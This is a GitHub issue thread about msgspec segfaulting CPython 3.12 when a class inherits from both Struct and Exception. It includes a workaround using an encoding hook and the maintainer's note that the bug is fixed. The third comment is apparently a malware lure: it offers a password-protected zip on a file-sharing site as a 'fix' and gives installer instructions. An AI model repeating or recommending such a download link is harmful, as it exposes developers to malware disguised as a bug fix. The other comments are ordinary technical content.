### ISSUE TITLE
Encoding exceptions - segfault

### ISSUE THREAD

**Issue by regnarg** [jcrist/msgspec#727]
### Question

I tried to make serializable exceptions using:

```
import msgspec
class TaggedException(msgspec.Struct, Exception, tag=True): pass
```

However, this reliably segfaults Python (CPython 3.12.5, msgspec 0.18.6).

I presume there is some kind of incompatibility between the C-level layout of Struct objects and Exception objects? Are there any good alternatives for encoding exception objects? (which seems super usefil when implementing APIs) Maybe this cannot be fixed. But maybe it should at least throw an error instead of crashing the interpreter?

**Comment by provinzkraut** [comment]
I usually do something like this:

```python


class EncodableException(Exception):
  def to_dict(self) -> dict[str, Any]:
   ...


def enc_hook(value: Any) -> Any:
  if isinstance(value, EncodableException):
    return value.to_dict()
  raise TypeError()
```

and then use this `enc_hook` whenever you're encoding stuff that might contain one of those exceptions.

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jcrist** [comment]
Thanks for opening this. In prior versions msgspec had a check preventing mixing `Struct` classes with other builtin types - this check was broken on Python 3.12 but is now fixed in #745. The above example now errors nicely rather than segfaulting. If you want to encode exceptions I recommend following a pattern like the one @provinzkraut outlined above rather than defining an `Exception` type that is also a `Struct`.
